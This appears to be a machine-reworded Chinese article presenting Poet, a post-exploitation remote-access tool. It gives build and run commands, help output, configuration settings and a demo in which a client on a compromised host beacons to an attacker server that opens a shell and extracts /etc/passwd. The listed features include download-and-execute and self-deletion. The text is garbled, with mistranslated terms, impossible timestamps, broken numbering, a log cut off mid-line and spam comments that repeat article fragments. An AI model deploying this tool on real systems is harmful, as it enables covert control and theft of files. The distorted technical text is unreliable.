Poet:一款功能强大的后渗透工具
简述
客户端程序必须运作在总体目标系统软件中,而且必须配备1个ip地址及其頻率来与网络服务器联接。要是当手机客户端试着与网络服务器联接时网络服务器不免费在线得话,手机客户端会处在静默睡眠状态,并等候下多次间隔时间来试着联接。要是网络服务器处在运作情况得话,网络攻击就可以得到shell,随后操纵手机客户端并在总体目标服务器中实行各种各样实际操作,比如:
1.??????互联网炮兵;
2.??????远程控制shell;
3.??????文档获取;
11.??????免费下载并实行Payload;
4.??????程序流程自毁
专用工具免费下载
Poet:【GitHub首页】
请浏览该新项目GitHub的releases网页页面,并下载最新版本的poet-client及其poet-server文档,或是你还可以依照下边的方式自个搭建Poet新项目。
搭建编码
请保证你早已安裝好啦python 2.6及其zip可执行程序,随后运作下述指令:
$ git clonehttps://github.Com/mossberg/poet $ Cd poet
$ make
运作以后将会在你的电子计算机中建立1个包括了poet-client和poet-server的bin/文件目录。
专用工具应用
Poet是这款应用起來比较简单的专用工具,它只必须Python2.2标准库只能运作。下边得出的是简易的应用样例:
终端设备1:
$ ./client.py -v 127.0.0.1 1
终端设备2:
$ sudo ./server.py
特别注意:默认设置配备下,服务端必须以root管理权限(应用sudo指令)运作,由于专用工具默认设置关联的端口号为443。请相信我,你还可以应用-p <PORT>指令来改动手机客户端和服务端所应用的端口号,提议采用超过1024的端口号。
此外,你能应用-h选择项来查询协助莱单:
手机客户端:
$ ./client.py -h
usage: client.py [-h] [-p PORT] [-v] [-d]iP INTERVAL
?
positional arguments:
?iP??????????????????? server
?INTERVAL????????????? (s)
?
optional arguments:
? -h,--help??????????? girl this help messageand exit
? -pPORT, --port PORT
? -v,--verbose
? -d,--delete????????? delete client uponexecution
服务端:
$ ./server.py -h
usage: server.py [-h] [-p PORT]
?
optional arguments:
? -h,--help??????????? girl this help messageand exit ? -pPORT, --port PORT
配备参照
common/config.py文档中包括多种多样配备选择项:
1.??????AUTH:密秘验证令牌必须在手机客户端与服务端中间共享资源以进行手机客户端的身份验证,,预编译的数据文件应用的是默认设置的公布验证令牌,提议客户自个设定1个繁杂的令牌以确保通讯的安全性。
2.??????ARCHIVE_DIR:服务端用以储存文档(輸出统计数据或获取的文档)的文件目录。
3.??????SERVER_iP:服务端的ip地址。
11.??????BEACON_INTERVAL:手机客户端信标抵达服务端的间隔时间(秒)。
Poet应用演试
在下边这一进攻情景中,网络攻击早已得到了总体目标服务器的浏览权,并在总体目标系统软件中免费下载实行了客户端程序。这时,网络攻击的服务端并沒有运作,可是没事儿,手机客户端会细心等候。最后,网络攻击打开了服务端,他最先打开了1个shell并实行了指令uname -a,随后获取出了/etc/passwd。接下去,他断掉了与客户端程序的联接,而手机客户端将会再次在总体目标服务器的后台管理中运作并等候下多次与服务端的联接。
总体目标机器设备(5.4.3.2):
$ ./client.py -v 1.2.3.4 12 [+] Poet started with delay of 12 secondsto port 443. Ctrl-c To exit.
[!] (2012-06-06 81:06:03.058921) Server isinactive
[!] (2012-06-06 81:06:13.060840) Server isinactive
[!] (2012-06-06
相关文章
- 5条评论
- 夙世亡鸦2022-06-01 11:41:33
- 认设置关联的端口号为443。请相信我,你还可以应用-p <PORT>指令来改动手机客户端和服务端所应用的端口号,提议采用超过1024的端口号。 此外,你能应用-h选择项来查询协助莱单: 手机客户端: $ ./client.py -h usage: client.py [-h
- 鸠骨庸颜2022-06-01 05:53:28
- 好啦python 2.6及其zip可执行程序,随后运作下述指令: $ git clonehttps://github.Com/mossberg/poet $ Cd poet $ make 运作以后将会在你的电子计算机中建立1个包括了poet-client和poe
- 鸢旧双笙2022-06-01 10:45:31
- 浏览该新项目GitHub的releases网页页面,并下载最新版本的poet-client及其poet-server文档,或是你还可以依照下边的方式自个搭建Poet新项目。 搭建编码 请保证你早已安裝好啦python 2.6及其zip可执行程序,随后运作下述指令: $ git clonehtt
- 离鸢吝吻2022-06-01 13:40:31
- ???程序流程自毁 专用工具免费下载 Poet:【GitHub首页】 请浏览该新项目GitHub的releases网页页面,并下载最新版本的poet-client及其p
- 边侣庸颜2022-06-01 10:23:18
- 简述 客户端程序必须运作在总体目标系统软件中,而且必须配备1个ip地址及其頻率来与网络服务器联接。要是当手机客户端试着与网络服务器联接时网络服务器不免费在线得话,手机客户端会处在静默睡眠状态,并等候下多次间隔时间来试着联接。要是网络